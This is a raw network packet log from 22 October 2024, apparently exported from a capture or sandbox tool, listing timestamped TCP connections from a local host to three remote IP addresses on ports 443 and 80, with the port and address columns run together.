                                                                                                                          Oct 22, 2024 16:11:58.170058012 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.170063019 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.170125961 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.170125961 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.170131922 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.170181990 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.170428991 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.170475960 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.170480013 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.170538902 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.170542955 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.170581102 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.180845976 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.180901051 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.180907965 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.180953979 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.222781897 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.222856045 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.222865105 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.222976923 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.279624939 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.279704094 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.279719114 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.279758930 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.282258987 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.290677071 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.290802956 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.400973082 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.401099920 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.401144028 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.401323080 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.401386976 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.401420116 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.401529074 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.401607037 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.401623011 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.401812077 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.406919956 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.408382893 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.408396959 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.408519983 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.417073011 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.417162895 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.417176962 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.418792009 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.518182993 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.518307924 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.518377066 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.518491983 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.518590927 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.518691063 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.518779993 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.518780947 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.518796921 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.518851042 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.518910885 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.523705959 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.523776054 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.523792028 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.526799917 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.532618046 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.534303904 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.534322023 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.534809113 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.635077953 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.635287046 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.635413885 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.635514021 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.635593891 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.635628939 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.638807058 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.638828039 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.639691114 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.640528917 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.640815020 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.640897989 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.640914917 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.642796040 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.649734974 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.650799990 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.650815010 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.654797077 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.751791000 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.751944065 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.752018929 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.752048969 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.752079010 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.752248049 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.752249002 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.752327919 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.752386093 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.752403021 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.754793882 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.754807949 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.757886887 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.757951021 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.757966995 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.758789062 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.766591072 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.766756058 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.766808987 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.766809940 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.766827106 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.770648956 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.770663023 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.770787001 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.868716002 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.868855000 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.868889093 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.868948936 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.868957996 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.869103909 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.869119883 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.869139910 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.869155884 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.869200945 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.874859095 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.874933958 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.874984980 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.875037909 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.883799076 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.883882999 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.883915901 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.883968115 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.883980989 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.884023905 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.884037018 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.884082079 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.927548885 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.927653074 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.985681057 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.985779047 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.985845089 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.985914946 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.985932112 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.985991955 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.986005068 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.986063957 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.986078024 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.986135960 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.991997957 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.992063999 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.992120028 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.992177010 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.992214918 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.992275953 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.992314100 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.992357016 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.992407084 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.992459059 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.000971079 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.001100063 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.001117945 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.001182079 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.001194954 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.001252890 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.001272917 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.001353979 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.021541119 CEST4999080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:00.026900053 CEST8049990193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.026966095 CEST4999080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:00.027342081 CEST4999080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:00.033148050 CEST8049990193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.044452906 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.044550896 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.102828979 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.102933884 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.103001118 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.103065968 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.829098940 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.829109907 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.829288960 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.829320908 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.829327106 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.829552889 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.829587936 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.829592943 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.829701900 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.829730034 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.829735994 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.829854012 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.829885006 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.829889059 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.830152035 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.830199957 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.830317020 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.871546984 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.871721983 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.871743917 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.872421980 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.876904011 CEST8049990193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.880763054 CEST4999080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:00.886240005 CEST8049990193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.945624113 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.945786953 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.945882082 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.945888996 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.945921898 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.945955038 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.946026087 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.946033955 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.946122885 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.946152925 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.946158886 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.946182013 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.946234941 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.946239948 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.946307898 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.946312904 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.946388006 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.946393013 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.946652889 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.946683884 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.946691036 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.946758032 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.946763039 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.947026014 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.947120905 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.947151899 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.947158098 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.947196960 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.947263002 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.947298050 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.947302103 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.947341919 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.947432041 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.947436094 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.947500944 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.947560072 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.947622061 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.947628021 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.947923899 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.958947897 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.958972931 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:01.130698919 CEST8049990193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:01.180934906 CEST4999080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:03.258141041 CEST4999180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:03.263659954 CEST8049991193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:03.263741016 CEST4999180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:03.264094114 CEST4999180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:03.269732952 CEST8049991193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:03.634610891 CEST49992443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:03.634706020 CEST44349992188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:03.634800911 CEST49992443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:03.643184900 CEST49992443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:03.643225908 CEST44349992188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.101454973 CEST8049991193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.104168892 CEST4999180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:04.110790014 CEST8049991193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.265017033 CEST44349992188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.265103102 CEST49992443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.268543959 CEST49992443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.268553972 CEST44349992188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.268975019 CEST44349992188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.272279978 CEST49992443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.319327116 CEST44349992188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.358023882 CEST8049991193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.416515112 CEST44349992188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.416743994 CEST44349992188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.416878939 CEST49992443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.421454906 CEST49992443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.430615902 CEST4999080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:04.437186956 CEST8049990193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.537982941 CEST4999180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:04.684355021 CEST8049990193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.686670065 CEST49993443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.686717033 CEST44349993188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.687047958 CEST49993443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.687047958 CEST49993443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.687086105 CEST44349993188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.725699902 CEST4999080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:04.850974083 CEST49994443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.851010084 CEST44349994188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.851181984 CEST49994443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.853161097 CEST49994443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.853172064 CEST44349994188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.300440073 CEST44349993188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.302887917 CEST49993443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:05.302937984 CEST44349993188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.444885015 CEST44349993188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.444968939 CEST44349993188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.446901083 CEST49993443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:05.450777054 CEST49993443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:05.484561920 CEST44349994188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.484687090 CEST49994443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:05.494785070 CEST49994443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:05.494812965 CEST44349994188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.495867968 CEST44349994188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.505033970 CEST49994443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:05.547352076 CEST44349994188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.571572065 CEST4999080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:05.574790955 CEST4999580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:05.577647924 CEST8049990193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.577914953 CEST4999080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:05.580213070 CEST8049995193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.582865000 CEST4999580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:05.590776920 CEST4999580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:05.596412897 CEST8049995193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.644999981 CEST44349994188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.645221949 CEST44349994188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.646785975 CEST49994443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:05.761271000 CEST49994443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:05.786778927 CEST4999180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:05.792152882 CEST8049991193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.034399986 CEST8049991193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.037790060 CEST49996443192.168.2.6188.114.97.3
